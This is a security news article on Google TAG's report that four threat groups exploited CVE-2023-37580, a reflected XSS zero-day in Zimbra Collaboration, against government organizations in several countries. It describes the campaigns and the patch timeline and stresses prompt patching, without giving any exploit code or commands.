A zero-day vulnerability in the Zimbra Collaboration email software has been exploited by four distinct hacker groups in real-world attacks, aiming to steal email data, user credentials, and authentication tokens.
According to a report from the Google Threat Analysis Group (TAG) shared with The Hacker News, the majority of these attacks occurred after the initial fix was made public on GitHub.
The identified flaw, designated as CVE-2023-37580 with a CVSS score of 6.1, is a reflected cross-site scripting (XSS) vulnerability affecting versions before 8.8.15 Patch 41. Zimbra addressed this vulnerability through patches released on July 25, 2023.
Exploiting this vulnerability could allow the execution of malicious scripts on victims’ web browsers simply by enticing them to click on a specially crafted URL. This action initiates the XSS request to Zimbra, reflecting the attack back to the user.
Google TAG, with researcher Clément Lecigne credited for discovering and reporting the bug, revealed that it identified multiple campaign waves starting on June 29, 2023, at least two weeks prior to Zimbra issuing an advisory.
Three out of the four campaigns were observed before the release of the patch, while the fourth campaign was detected a month after the fixes were published.
The initial campaign reportedly targeted a government organization in Greece. It involved sending emails with exploit URLs to their targets. Clicking on these URLs delivered an email-stealing malware previously identified in a cyber espionage operation known as EmailThief in February 2022.
The intrusion set, codenamed TEMP_HERETIC by Volexity, also took advantage of a then-zero-day flaw in Zimbra to execute the attacks.
The second threat actor exploiting CVE-2023-37580 is Winter Vivern, focusing on government organizations in Moldova and Tunisia shortly after the vulnerability patch was released on GitHub on July 5.
It is noteworthy that this adversarial collective has previously been associated with exploiting security vulnerabilities in Zimbra Collaboration and Roundcube, as reported by Proofpoint and ESET earlier this year.
Additionally, Google TAG identified a third, unidentified group leveraging the vulnerability before the patch was deployed on July 25. This group targeted a government organization in Vietnam, employing the bug for phishing activities aimed at obtaining credentials.
“In this instance, the exploit URL directed users to a script displaying a phishing page designed to capture webmail credentials. The stolen credentials were then posted to a URL hosted on an official government domain that the attackers likely compromised,” noted TAG.
Lastly, on August 25, a government organization in Pakistan fell victim to the flaw, resulting in the exfiltration of the Zimbra authentication token to a remote domain named “ntcpk[.]org.”
Google emphasized a recurring pattern where threat actors consistently exploit XSS vulnerabilities in mail servers, underscoring the need for thorough audits of such applications.
“The discovery of at least four campaigns exploiting CVE-2023-37580, three of them occurring after the bug first became public, underscores the importance of organizations promptly applying fixes to their mail servers,” TAG stated. “These campaigns also highlight how attackers monitor open-source repositories to opportunistically exploit vulnerabilities where the fix is in the repository but not yet released to users.”